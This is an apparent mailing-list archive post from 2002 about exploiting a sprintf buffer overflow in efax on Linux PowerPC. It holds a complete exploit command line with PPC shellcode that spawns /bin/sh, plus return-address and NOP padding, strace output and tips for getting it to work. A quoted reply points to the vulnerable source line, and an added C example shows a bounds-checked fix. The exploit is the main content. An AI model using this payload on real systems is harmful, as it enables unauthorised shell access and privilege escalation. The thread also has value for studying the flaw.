I was playing with efax on ppc and it is REAL picky about how the shellcode is laid out... or it could be a problem with a char in my shellcode also. Regardless the layout is <returns><nops><shellcode>. I have found I must have a trailing 0x2f if I try this method... otherwise the /sh gets lopped off. It then adds ..0 and then the pid of the process. This is obvious if you look at the code below provided by s1gnal_9. Here are some strace dumps and some ugly perl from me so have fun. (perl is NOT my forte) and sorry that my MUI sucks and chops all my lines up...

[root@linuxppc root]# strace /usr/bin/efax -x `perl -e 'print "\x7f\xff\x25\xc0" x 274'``perl -e 'print "\x69\x69\x69\x69" x 14'``perl -e 'print"\x7c\xa5\x2a\x78\x40\x82\xff\xed\x7f\xe8\x02\xa6\x3b\xff\x01\x30\x38\x7f\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8\x3b\xc0\x01\x60\x7f\xc0\x2e\x70\x44\xff\xff\x02\x2f\x62\x69\x6e\x2f\x73\x68\x2f" x 1'``perl -e 'print "\x69\x69\x69\x69" x 14'`

execve("/usr/bin/efax", ["/usr/bin/efax", "-x", "..( returns here) ÿ%Àÿ%Àiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii|¥*x@,ÿíè¦;ÿ08þô?aÿø?¡ÿü8?ÿø;À`À.pDÿÿ/bin/sh/iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii"], [/* 46 vars */]) = 0
...
write(2, "efax: 15:10 Error: can\'t open pr"..., 1279efax: 15:10 Error: can't open pre-lock file ( returns here ) %Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àÿ%Àiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii|¥*x@,ÿíè¦;ÿ08þô?aÿø?¡ÿü8?ÿø;À`À.pDÿÿ/bin/sh/TMP..01350: File name too long
) = 1279
execve("/bin/sh/TMP..01350", ["/bin/sh/TMP..01350"]ptrace: umoven: Input/output error
, [/* 0 vars */]) = -1 ENOTDIR (Not a directory)
--- SIGILL (Illegal instruction) ---

If you look here you can see that somehow my execve got TMP..01350 appended to it and also a slash because obviously I put it there... if I didn't add the / my execve would say execve("/bin/TMP..01350", ["/bin/TMP..01350"] ... instead I am left to work with the following...

execve("/bin/sh/TMP..01350", ["/bin/sh/TMP..01350"]ptrace: umoven: Input/output error
, [/* 0 vars */]) = -1 ENOTDIR (Not a directory)

It is workable though *grin*... adjust the shellcode a bit and add TMP..pid on to the end of it... mkdir /tmp/sh/ and copy a few binaries to TMP..0xxxx. Have fun and if you don't maybe you can work out a better way. (I just thought of one but I am lazy... it involves lopping off sh and just using TMP..pid for the bin).

-KF

+++ killed by SIGILL +++

s1gnal_9 wrote:
> More info about the overflow...
>
> Straight from efax src.
>
> <--snip--->
> #define EFAX_PATH_MAX 1024
> <--/snip--->
>
> <--snip--->
> char *p , buf [ EFAX_PATH_MAX ] = "" ;
> <--/snip--->
>
> <--snip--->
> sprintf ( buf , "%.*sTMP..%05d" , dirlen , fname , (int) pid ) ;
> <--/snip--->
>
> the sprintf above causes the overflow..
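The sprintf() call quoted from the efax source, with a bounds-checked replacement next to a helper that reports how far the unchecked call would write. This is an added example, not efax's code; dir_prefix_len() is my assumption of how dirlen is derived (everything up to and including the last '/'), since the thread does not show that part, and it reproduces the /bin/sh/TMP..01350 versus /bin/TMP..01350 names KF saw.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define EFAX_PATH_MAX 1024   /* value quoted from the efax source in the thread */

/* Assumed derivation of dirlen: bytes of fname up to and including the
   last '/', or 0 if there is no slash.  Attacker-controlled fname means
   attacker-controlled dirlen, which is what the sprintf() relies on. */
static size_t dir_prefix_len(const char *fname)
{
    const char *slash = strrchr(fname, '/');
    return slash ? (size_t)(slash - fname) + 1 : 0;
}

/* Bounds-checked replacement for
   sprintf(buf, "%.*sTMP..%05d", dirlen, fname, (int) pid).
   Returns the length written, or -1 when the name would not fit in
   out[outsz]: exactly the case in which sprintf() runs past the end of
   buf[EFAX_PATH_MAX]. */
int build_lock_name(char *out, size_t outsz, const char *fname, int pid)
{
    size_t dirlen = dir_prefix_len(fname);
    int n = snprintf(out, outsz, "%.*sTMP..%05d", (int)dirlen, fname, pid);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';   /* refuse the name instead of truncating it */
        return -1;
    }
    return n;
}

/* Bytes the unchecked sprintf() writes for this fname: prefix, "TMP..",
   the pid digits and the terminating NUL.  Anything above EFAX_PATH_MAX
   is an overflow of buf. */
size_t unchecked_write_size(const char *fname, int pid)
{
    char digits[32];
    size_t ndig = (size_t)snprintf(digits, sizeof digits, "%05d", pid);
    return dir_prefix_len(fname) + strlen("TMP..") + ndig + 1;
}

int main(void)
{
    char out[EFAX_PATH_MAX];
    const char *cases[] = { "/bin/sh/", "/bin/sh" };   /* constructed inputs */
    for (int i = 0; i < 2; i++)
        printf("%-9s -> %s\n", cases[i],
               build_lock_name(out, sizeof out, cases[i], 1350) < 0 ? "(rejected)" : out);
    return 0;
}
```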
This archive was generated by hypermail 2b30 : Thu Jan 17 2002 - 23:09:34 PST